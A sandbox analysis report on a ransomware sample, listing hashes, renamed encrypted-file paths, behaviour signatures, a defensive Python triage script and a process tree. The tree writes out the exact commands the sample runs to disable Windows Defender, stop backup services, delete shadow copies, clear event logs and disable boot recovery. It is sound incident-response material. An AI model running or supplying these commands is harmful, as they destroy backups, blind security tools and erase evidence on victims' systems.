Resubmissions
Submitted          Analysis ID          Score
12-01-2022 20:48   220112-zlnz9adhf2    10
12-01-2022 19:37   220112-yb5pksdgc6    10
12-01-2022 19:25   220112-x5evksdgdl    10
12-01-2022 16:50   220112-vb8jpadcc4    10
Analysis
max time kernel: 122s
max time network: 122s
platform: windows7_x64
resource: win7-en-20211208
submitted: 12-01-2022 16:50
Static task: static1
Behavioral task: behavioral1
  Sample: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
  Resource: win10-en-20211208
General
Target: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Size: 2.6MB
MD5: 47f540350b1d360403225d146cc7fbb8
SHA1: 43ad25b99cb47c7367b1703315402bb9e4970590
SHA256: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf
SHA512: 91387685946beb65cddbc62b19102a1135511563bd84f24cacc402a1e5a1afb750887fa9d50e7120acd23ae27af53669a45fc48363c000b7f2ffb777036019ce
Malware Config
Signatures
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all AV definitions.
Processes:
  PID 2124  MpCmdRun.exe

Modifies security service (2 TTPs, 1 IoC)
Processes:
  reg.exe  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
  PID 2060  bcdedit.exe
  PID 2084  bcdedit.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
Process: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe (PID 1740)
Every entry below is "File opened for modification" by the sample. Most paths already carry the appended pattern <original name>.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_<12 characters>.8zvpm; the 43-character token is identical on every renamed file in this run and the 12-character token differs per file. The remaining paths were logged under their original names.
  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR32F.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Cjq7i5-85uM0.8zvpm
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Emf4H2gsN9Y0.8zvpm
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_h2gxVkSe8gY0.8zvpm
  C:\Program Files (x86)\Common Files\System\msadc\es-ES\msadcor.dll.mui
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02126_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_qT_6RMGyFS40.8zvpm
  C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WITHCOMP.DPV.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Vc7l7GUTGk40.8zvpm
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P__gKENxS6lK80.8zvpm
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_P7UElgM63i80.8zvpm
  C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PULQOT98.POC.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_o7j6sCY8xaE0.8zvpm
  C:\Program Files (x86)\Internet Explorer\en-US\jsprofilerui.dll.mui
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02285_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_dPVTZJcQdKI0.8zvpm
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_K2Um2-Zvk4k0.8zvpm
  C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_tCbX-LnIX4k0.8zvpm
  C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\IPSEventLogMsg.dll.mui
  C:\Program Files\Common Files\System\fr-FR\wab32res.dll.mui
  C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_top.png
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Dmvddsi-j5s0.8zvpm
  C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\RSSFeeds.css
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Xa3rNeMhGos0.8zvpm
  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_gFp2Lz3D6qc0.8zvpm
  C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\settings.html
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_FjrUu8kA9GA0.8zvpm
  C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_cRh6jGYF6sI0.8zvpm
  C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui
  C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\logo.png
  C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui
  C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Perspective.eftx.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_DuQa_nCrD7E0.8zvpm
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14516_.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P__IHG07kjmUw0.8zvpm
  C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png
  C:\Program Files\InitializeHide.txt.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_jIqAC-agpbw0.8zvpm
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_6azglXMnpKY0.8zvpm
  C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00705_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_pICAV3dOpms0.8zvpm
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ADD.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Ntk3WJ_hUGE0.8zvpm
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_mMPJoetjasQ0.8zvpm
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281630.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_-r2y-V3WxFo0.8zvpm
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02617_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_4brTOgnSmu40.8zvpm
  C:\Program Files\Windows Media Player\es-ES\WMPDMC.exe.mui
  C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\gadget.xml
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_9G5URH2EE1Q0.8zvpm
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Wt5E9D_hG-k0.8zvpm
  C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSWDS_EN.LEX.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_bmAUTjpA3FU0.8zvpm
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_1MOin5TwB7g0.8zvpm
  C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_QOV0js0kd-80.8zvpm
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_r4xQ9KVnuRM0.8zvpm
  C:\Program Files\Common Files\Microsoft Shared\ink\hwrdeslm.dat
  C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_ButtonGraphic.png
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_BkQA5DL5iO40.8zvpm
  C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_right.png
  C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\helpmap.txt
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_0PAHV9iP9kA0.8zvpm
  C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_COL.HXC.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_xFDAs7LR4Ec0.8zvpm
  C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow.css.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_klC0-99jnMg0.8zvpm
  C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png
  C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_IUtZ4Slu9ZA0.8zvpm
  C:\Program Files\Windows Media Player\ja-JP\wmlaunch.exe.mui
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\settings.css
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_increaseindent.gif.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_qBA47-oe0ZA0.8zvpm
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg.png
  C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Flow.eftx.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_GWe7mxBjEow0.8zvpm
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10256_.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_MwcJqvAbEvM0.8zvpm
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  PID 516  vssadmin.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  PID 2160  powershell.exe
  PID 2244  powershell.exe
  PID 1740  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (privileges enabled per process; the report caps this list at 64 entries):
  wevtutil.exe  PID 1960: SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe  PID 1080: SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe  PID 1312: SeSecurityPrivilege, SeBackupPrivilege
  wmic.exe  PID 1112: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  wmic.exe  PID 460: the same 20 privileges, enabled twice; the second pass is cut off after LUID 33 by the 64-entry cap
The numeric entries are privilege LUIDs the sandbox did not resolve to names: 33 is SeIncreaseWorkingSetPrivilege, 34 is SeTimeZonePrivilege, 35 is SeCreateSymbolicLinkPrivilege. Enabling every privilege in the token is the normal start-up behaviour of the WMI command-line client, so for wmic.exe this signature is context for the "shadowcopy delete" command rather than evidence on its own; for wevtutil.exe, SeSecurityPrivilege and SeBackupPrivilege are exactly what clearing the Security log requires.

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (parent PID -> child PID; the raw log records each relationship three times and caps at 64 entries, so the last sc.exe child appears once):
  1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1544 net.exe;  1544 net.exe -> 556 net1.exe
  1740 -> 676 net.exe;  676 net.exe -> 576 net1.exe
  1740 -> 1424 net.exe;  1424 net.exe -> 856 net1.exe
  1740 -> 1668 net.exe;  1668 net.exe -> 1828 net1.exe
  1740 -> 1132 net.exe;  1132 net.exe -> 916 net1.exe
  1740 -> 812 net.exe;  812 net.exe -> 1996 net1.exe
  1740 -> 1956 net.exe;  1956 net.exe -> 1236 net1.exe
  1740 -> 1872 net.exe;  1872 net.exe -> 2008 net1.exe
  1740 -> 1660 sc.exe;  1740 -> 1060 sc.exe;  1740 -> 548 sc.exe;  1740 -> 892 sc.exe;  1740 -> 1736 sc.exe;  1740 -> 776 sc.exe
Every write here goes from a parent into a child it has just created, which is consistent with process start-up rather than injection into an already running process.
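The renamed paths in the "Drops file in Program Files directory" list all follow one shape, and pulling it apart is the first thing a responder wants when triaging a file-activity log from an affected host. The Python below is an added example, not part of the report: it recovers the original file name from a renamed path, separates the run-wide 43-character token from the 12-character per-file token, and reports how long each token is when read as unpadded base64url (32 and 9 bytes). The embedded paths are copied from the report's list; what the two tokens encode is not established by the report, and the code does not guess.

```python
import base64
import re
from collections import Counter

# Pattern appended to files in the IoC list:
#   <original name>.<43 base64url chars>_<12 base64url chars>.8zvpm
# The 43-char token is the same on every renamed file in this run; the
# 12-char token differs per file.
RENAMED_RE = re.compile(
    r"^(?P<original>.+?)\."
    r"(?P<run_token>[A-Za-z0-9_-]{43})_"
    r"(?P<file_token>[A-Za-z0-9_-]{12})"
    r"\.8zvpm$"
)

# Paths copied from the report (six of the 64 entries). The last two were
# logged under their original names.
REPORT_PATHS = [
    r"C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR32F.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Cjq7i5-85uM0.8zvpm",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P__gKENxS6lK80.8zvpm",
    r"C:\Program Files\InitializeHide.txt.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_jIqAC-agpbw0.8zvpm",
    r"C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_gFp2Lz3D6qc0.8zvpm",
    r"C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png",
    r"C:\Program Files (x86)\Common Files\System\msadc\es-ES\msadcor.dll.mui",
]


def b64url_decode(token: str) -> bytes:
    """Decode unpadded base64url; the tokens in the report carry no '=' padding."""
    return base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))


def parse_renamed_path(path: str):
    """Return the components of a renamed path, or None if the name does not
    carry the pattern (the file was logged before or without renaming)."""
    directory, _, name = path.rpartition("\\")
    m = RENAMED_RE.match(name)
    if m is None:
        return None
    stem, dot, ext = m["original"].rpartition(".")
    return {
        "directory": directory,
        "original_name": m["original"],
        "original_ext": ext.lower() if dot else "",
        "run_token": m["run_token"],
        "file_token": m["file_token"],
        "run_token_bytes": len(b64url_decode(m["run_token"])),
        "file_token_bytes": len(b64url_decode(m["file_token"])),
    }


def triage(paths):
    """Summarise a batch of paths from a file-activity log: how many are renamed,
    how many distinct run tokens appear (one in this run), whether the per-file
    tokens are unique, and which original names can be recovered."""
    parsed = [(p, parse_renamed_path(p)) for p in paths]
    renamed = [r for _, r in parsed if r]
    return {
        "total": len(paths),
        "renamed": len(renamed),
        "unrenamed": [p for p, r in parsed if r is None],
        "run_tokens": Counter(r["run_token"] for r in renamed),
        "file_tokens_unique": len({r["file_token"] for r in renamed}) == len(renamed),
        "recovered_names": [r["original_name"] for r in renamed],
    }


if __name__ == "__main__":
    summary = triage(REPORT_PATHS)
    print(f"{summary['renamed']}/{summary['total']} paths renamed; "
          f"run tokens: {dict(summary['run_tokens'])}")
    for name in summary["recovered_names"]:
        print("recovered:", name)
```

Feed it the full 64-entry list (or a file-activity export from a host) and a second distinct run token would indicate a second run or key on the same machine; the unrenamed paths are the files to check for partial encryption, since the sandbox logged them as opened for modification under their original names.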
Processes
Depth-indented process tree. Each line gives: [depth] PID, image path | command line | signatures raised by that process.
[1] PID 1740  C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | "C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe" | Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  [2] PID 1544  C:\Windows\system32\net.exe | net.exe stop "NetMsmqActivator" /y | Suspicious use of WriteProcessMemory
    [3] PID 556  C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  [2] PID 676  C:\Windows\system32\net.exe | net.exe stop "SamSs" /y | Suspicious use of WriteProcessMemory
    [3] PID 576  C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y
  [2] PID 1424  C:\Windows\system32\net.exe | net.exe stop "SDRSVC" /y | Suspicious use of WriteProcessMemory
    [3] PID 856  C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y
  [2] PID 1668  C:\Windows\system32\net.exe | net.exe stop "SstpSvc" /y | Suspicious use of WriteProcessMemory
    [3] PID 1828  C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y
  [2] PID 1132  C:\Windows\system32\net.exe | net.exe stop "UI0Detect" /y | Suspicious use of WriteProcessMemory
    [3] PID 916  C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y
  [2] PID 812  C:\Windows\system32\net.exe | net.exe stop "VSS" /y | Suspicious use of WriteProcessMemory
    [3] PID 1996  C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "VSS" /y
  [2] PID 1956  C:\Windows\system32\net.exe | net.exe stop "wbengine" /y | Suspicious use of WriteProcessMemory
    [3] PID 1236  C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y
  [2] PID 1872  C:\Windows\system32\net.exe | net.exe stop "WebClient" /y | Suspicious use of WriteProcessMemory
    [3] PID 2008  C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y
  [2] PID 1660  C:\Windows\system32\sc.exe | sc.exe config "NetMsmqActivator" start= disabled
  [2] PID 1060  C:\Windows\system32\sc.exe | sc.exe config "SamSs" start= disabled
  [2] PID 548  C:\Windows\system32\sc.exe | sc.exe config "SDRSVC" start= disabled
  [2] PID 892  C:\Windows\system32\sc.exe | sc.exe config "SstpSvc" start= disabled
  [2] PID 1736  C:\Windows\system32\sc.exe | sc.exe config "UI0Detect" start= disabled
  [2] PID 776  C:\Windows\system32\sc.exe | sc.exe config "VSS" start= disabled
  [2] PID 1716  C:\Windows\system32\sc.exe | sc.exe config "wbengine" start= disabled
  [2] PID 1604  C:\Windows\system32\sc.exe | sc.exe config "WebClient" start= disabled
  [2] PID 524  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 1332  C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [2] PID 1256  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] PID 1320  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [2] PID 1272  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [2] PID 916  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 1964  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [2] PID 1492  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] PID 1720  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 744  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] PID 1560  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [2] PID 1392  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [2] PID 680  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [2] PID 1744  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [2] PID 1908  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] PID 1648  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] PID 652  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  [2] PID 1748  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  [2] PID 616  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  [2] PID 1968  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  [2] PID 1840  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  [2] PID 1640  C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  [2] PID 1056  C:\Windows\system32\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  [2] PID 716  C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  [2] PID 1704  C:\Windows\system32\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 268  C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 576  C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 1168  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 392  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 1356  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 1768  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 1136  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f | Modifies security service
  [2] PID 1732  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 516  C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet | Interacts with shadow copies
  [2] PID 1960  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl system | Suspicious use of AdjustPrivilegeToken
  [2] PID 1080  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl security | Suspicious use of AdjustPrivilegeToken
  [2] PID 1312  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl application | Suspicious use of AdjustPrivilegeToken
  [2] PID 1112  C:\Windows\System32\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive | Suspicious use of AdjustPrivilegeToken
  [2] PID 460  C:\Windows\System32\Wbem\wmic.exe | wmic.exe shadowcopy delete | Suspicious use of AdjustPrivilegeToken
  [2] PID 2060  C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Modifies boot configuration data using bcdedit
  [2] PID 2084  C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} recoveryenabled no | Modifies boot configuration data using bcdedit
  [2] PID 2104  C:\Windows\system32\cmd.exe | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    [3] PID 2124  C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All | Deletes Windows Defender Definitions
  [2] PID 2140  C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    [3] PID 2160  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIOAVProtection $true | Suspicious behavior: EnumeratesProcesses
  [2] PID 2224  C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    [3] PID 2244  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableRealtimeMonitoring $true | Suspicious behavior: EnumeratesProcesses
PIDs 576 and 916 each appear twice in this tree (first as net1.exe, later as reg.exe): Windows reuses a PID as soon as the earlier process has exited, so correlate these events on process GUID or creation time rather than on PID alone.
